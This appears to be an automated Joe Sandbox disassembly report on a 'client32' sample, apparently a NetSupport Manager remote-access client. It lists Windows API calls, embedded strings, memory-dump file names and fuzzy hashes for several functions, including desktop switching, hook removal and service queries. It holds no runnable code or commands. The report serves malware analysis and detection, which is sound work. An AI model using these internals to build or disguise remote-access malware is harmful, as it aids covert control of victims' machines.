                                                                                                                        • Instruction Fuzzy Hash: 1441EB759403149BEB20DF64CC48BEEB3BAEF84305F8044AAE90997181EB705E58CFA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 11141AB0: _memset.LIBCMT ref: 11141AF5
                                                                                                                          • Part of subcall function 11141AB0: GetVersionExA.KERNEL32(?), ref: 11141B0E
                                                                                                                          • Part of subcall function 11141AB0: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11141B35
                                                                                                                          • Part of subcall function 11141AB0: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11141B47
                                                                                                                          • Part of subcall function 11141AB0: FreeLibrary.KERNEL32(00000000), ref: 11141B5F
                                                                                                                          • Part of subcall function 11141AB0: GetSystemDefaultLangID.KERNEL32 ref: 11141B6A
                                                                                                                        • AdjustWindowRectEx.USER32(1113DE08,00CE0000,00000001,00000001), ref: 111312A7
                                                                                                                        • LoadMenuA.USER32(00000000,000003EC), ref: 111312B8
                                                                                                                        • GetSystemMetrics.USER32(00000021), ref: 111312C9
                                                                                                                        • GetSystemMetrics.USER32(0000000F), ref: 111312D1
                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 111312D7
                                                                                                                        • GetDC.USER32(00000000), ref: 111312E3
                                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 111312EE
                                                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 111312FA
                                                                                                                        • CreateWindowExA.USER32(00000001,NSMWClass,025508A0,00CE0000,80000000,80000000,1113DE08,?,00000000,?,11000000,00000000), ref: 1113134F
                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,110F58A9,00000001,1113DE08,_debug), ref: 11131357
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                                        • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                                        • API String ID: 1594747848-1114959992
                                                                                                                        • Opcode ID: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                        • Instruction ID: c1c99cb922432dc138ba9c202a31cb7aa0d0c26f00a3c7d74779ab3f3301680f
                                                                                                                        • Opcode Fuzzy Hash: f79aa2a339231c942e312d8c047aaa8dcd578a5d72aad0640aa64dc35281c2a5
                                                                                                                        • Instruction Fuzzy Hash: 51318371E00219AFDB109FE58C85FBFFBB8EB88704F204528FA11F7284D67469408BA5
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,?,?,7E4636A2), ref: 1102CA84
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102CA9A
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102CAAE
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAB5
                                                                                                                        • Sleep.KERNEL32(00000032), ref: 1102CAC6
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 1102CAD6
                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 1102CB22
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 1102CB4F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                                        • String ID: >$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                                        • API String ID: 83693535-2077998243
                                                                                                                        • Opcode ID: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                        • Instruction ID: feb44ee288a455167e99161b47e0bacd9894a59b82cfe6c7d6bea4f2cf3f1955
                                                                                                                        • Opcode Fuzzy Hash: f7652f20f0480d0e58ed8b063f8ba6e6fa0130e74124b5fc42b694c068d9827e
                                                                                                                        • Instruction Fuzzy Hash: 86B1B675E012299FDB22CFA4CD84BE9B7F5EB48708F5041E9E919A7380E7709A80CF51
                                                                                                                        APIs
                                                                                                                        • wsprintfA.USER32 ref: 1112FCF0
                                                                                                                        • GetTickCount.KERNEL32 ref: 1112FD21
                                                                                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 1112FD34
                                                                                                                        • GetTickCount.KERNEL32 ref: 1112FD3C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$FolderPathwsprintf
                                                                                                                        • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                                        • API String ID: 1170620360-4157686185
                                                                                                                        • Opcode ID: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                        • Instruction ID: f8032102c9863659257b5da4bc21e17edc1143fb98c82bb39be53882a9ddc186
                                                                                                                        • Opcode Fuzzy Hash: 78a63d7b21251ac58094383af1bcedcc42cf96c0ee4e19e00727c6ac0e69d346
                                                                                                                        • Instruction Fuzzy Hash: 5731597AE0132A6BEA109FE59C80FFEF7789F5030DF200075ED55EA244EA31A5448B92
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                          • Part of subcall function 11105D40: OpenEventA.KERNEL32(00000002,00000000,nsm_gina_sas,00000009), ref: 11105E1A
                                                                                                                          • Part of subcall function 11105D40: CloseHandle.KERNEL32(00000000), ref: 11105E29
                                                                                                                          • Part of subcall function 11105D40: GetSystemDirectoryA.KERNEL32(?,000000F7), ref: 11105E3B
                                                                                                                          • Part of subcall function 11105D40: LoadLibraryA.KERNEL32(?), ref: 11105E71
                                                                                                                          • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,GrabKM), ref: 11105E9E
                                                                                                                          • Part of subcall function 11105D40: GetProcAddress.KERNEL32(?,LoggedOn), ref: 11105EB6
                                                                                                                        • GetStockObject.GDI32(0000000D), ref: 11030672
                                                                                                                        • GetObjectA.GDI32(00000000,0000003C,?), ref: 11030682
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C0
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 110306C6
                                                                                                                        • InterlockedExchange.KERNEL32(02248D58,00001388), ref: 11030746
                                                                                                                        • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 11030778
                                                                                                                        • _sprintf.LIBCMT ref: 1103078D
                                                                                                                        • _setlocale.LIBCMT ref: 11030797
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressErrorModeObjectProc$CloseDirectoryEventExchangeHandleInterlockedLibraryLoadOpenStockSystem_memset_setlocale_sprintfwsprintf
                                                                                                                        • String ID: .%d$Error %s unloading audiocap dll$pcicl32
                                                                                                                        • API String ID: 3430446287-3899566344
                                                                                                                        • Opcode ID: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                        • Instruction ID: 7e43821cc75c177b4768292a53131964eea8ecc700feb9324c3a072739083bb6
                                                                                                                        • Opcode Fuzzy Hash: f1f28ec3ab837d54fd286a0c8f1f58c599bf04ba19ecf6f4903bac0d6648c01a
                                                                                                                        • Instruction Fuzzy Hash: B291F8B4D06359DEEF02CBF488447ADFEF6AB8430CF1041AAD445A7289FB755A44CB52
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(111ECE98,75BF8400), ref: 11141740
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114177F
                                                                                                                        • _memset.LIBCMT ref: 1114179D
                                                                                                                          • Part of subcall function 1113F670: RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,?,75BF8400,?,?,111417CF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F690
                                                                                                                        • _strncpy.LIBCMT ref: 1114186A
                                                                                                                          • Part of subcall function 111601FD: __isdigit_l.LIBCMT ref: 11160222
                                                                                                                        • RegCloseKey.KERNEL32(00000000), ref: 11141906
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseOpenQueryValueVersion__isdigit_l_memset_strncpy
                                                                                                                        • String ID: CSDVersion$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Service Pack
                                                                                                                        • API String ID: 3299820421-2117887902
                                                                                                                        • Opcode ID: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                        • Instruction ID: 6295e9c0ce894988be5bd3b5eca6cb3bc4700dba655a443855223a39f27a81e3
                                                                                                                        • Opcode Fuzzy Hash: b8864b494b3fac32ad8ebd53af7f3ba24bc78c93f4beef13e60cba419166683e
                                                                                                                        • Instruction Fuzzy Hash: A051D975F0022AAFEB21CFA4CC41FEEFBB59B01708F1040A9E519A6181E7707A84CF91
                                                                                                                        APIs
                                                                                                                        • _strtok.LIBCMT ref: 11026896
                                                                                                                        • _strtok.LIBCMT ref: 110268D0
                                                                                                                        • Sleep.KERNEL32(?,?,*max_sessions,0000000A,00000000), ref: 110269C4
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _strtok$Sleep
                                                                                                                        • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                                        • API String ID: 2009458258-3774545468
                                                                                                                        • Opcode ID: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                        • Instruction ID: 98283bc1e60aabc3c83d60b427db3e00e80f6799957732ebefc1b0d9f7cef5d9
                                                                                                                        • Opcode Fuzzy Hash: 5d0b38da53809c6216564b10fa26affc32737c16451f306886d41c61f9b2a0b7
                                                                                                                        • Instruction Fuzzy Hash: 4051F371F0025E9BDB12CFE5CD80BEEFBE9AB84308F504169DC55A7244EB306945C792
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,685A67B5), ref: 68598D6B
                                                                                                                          • Part of subcall function 68594F70: LoadLibraryA.KERNEL32(psapi.dll,?,68598DC8), ref: 68594F78
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 68598DCB
                                                                                                                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 68598DD8
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 68598EBF
                                                                                                                          • Part of subcall function 68594FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 68594FC4
                                                                                                                          • Part of subcall function 68594FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,68598E0D,00000000,?,68598E0D,00000000,?,00000FA0,?), ref: 68594FE4
                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,?,00000FA0,?), ref: 68598EAE
                                                                                                                          • Part of subcall function 68595000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 68595014
                                                                                                                          • Part of subcall function 68595000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,68598E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 68595034
                                                                                                                          • Part of subcall function 68592420: _strrchr.LIBCMT ref: 6859242E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                                        • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                                        • API String ID: 2714439535-3484705551
                                                                                                                        • Opcode ID: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
                                                                                                                        • Instruction ID: ab8864ea8cf839c0dac882c909dfb3055c68c0a934503256c46ccfb76580efe1
                                                                                                                        • Opcode Fuzzy Hash: e7659b2a6ff5a18690e2f6621ea8dd012defe8cf504c39afbf2198268fdeb3af
                                                                                                                        • Instruction Fuzzy Hash: C841F8759402599BEF10DB59DC55FFEB378EB45704FC00095EE29A2240EB319E84CF62
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 110883C0: UnhookWindowsHookEx.USER32(?), ref: 110883E3
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 110FFE7C
                                                                                                                        • GetThreadDesktop.USER32(00000000), ref: 110FFE83
                                                                                                                        • OpenDesktopA.USER32(?,00000000,00000000,02000000), ref: 110FFE93
                                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 110FFEA0
                                                                                                                        • CloseDesktop.USER32(00000000), ref: 110FFEB9
                                                                                                                        • GetLastError.KERNEL32 ref: 110FFEC1
                                                                                                                        • CloseDesktop.USER32(00000000), ref: 110FFED7
                                                                                                                        • GetLastError.KERNEL32 ref: 110FFEDF
                                                                                                                        Strings
                                                                                                                        • OpenDesktop(%s) failed, e=%d, xrefs: 110FFEE7
                                                                                                                        • SetThreadDesktop(%s) ok, xrefs: 110FFEAB
                                                                                                                        • SetThreadDesktop(%s) failed, e=%d, xrefs: 110FFEC9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                                        • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                                        • API String ID: 2036220054-60805735
                                                                                                                        • Opcode ID: 312bc41d0c80e05ecd2e77a132ac577f729ffb3f5c645a3c4c1f69d055c1a107
